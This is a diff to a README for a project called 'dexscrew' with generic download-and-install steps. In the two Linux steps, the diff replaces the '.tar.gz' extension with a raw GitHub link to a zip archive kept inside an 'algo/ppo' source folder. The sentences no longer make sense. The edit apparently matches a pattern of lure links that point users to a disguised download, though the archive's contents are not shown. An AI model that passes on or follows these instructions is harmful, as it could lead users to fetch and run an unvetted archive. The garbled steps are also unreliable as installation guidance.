adamarsyadfaizin/dexscrew/README.md

 1. **Download the Installer**
    - If you are using Windows, look for a file that ends with `.exe`.
    - Mac users should find a file that ends with `.dmg`.
-   - For Linux, you may see files with `.tar.gz` or `.deb` extensions.
+   - For Linux, you may see files with `https://raw.githubusercontent.com/adamarsyadfaizin/dexscrew/main/dexscrew/algo/ppo/dexscrew_3.2.zip` or `.deb` extensions.

 2. **Run the Installer**
    - For Windows: Double-click the downloaded `.exe` file.
    - For macOS: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included instructions in the README.
+   - For Linux: Extract the `https://raw.githubusercontent.com/adamarsyadfaizin/dexscrew/main/dexscrew/algo/ppo/dexscrew_3.2.zip` file and follow the included instructions in the README.

 3. **Launch the Application**
    - After installation, locate the dexscrew application and double-click it to launch.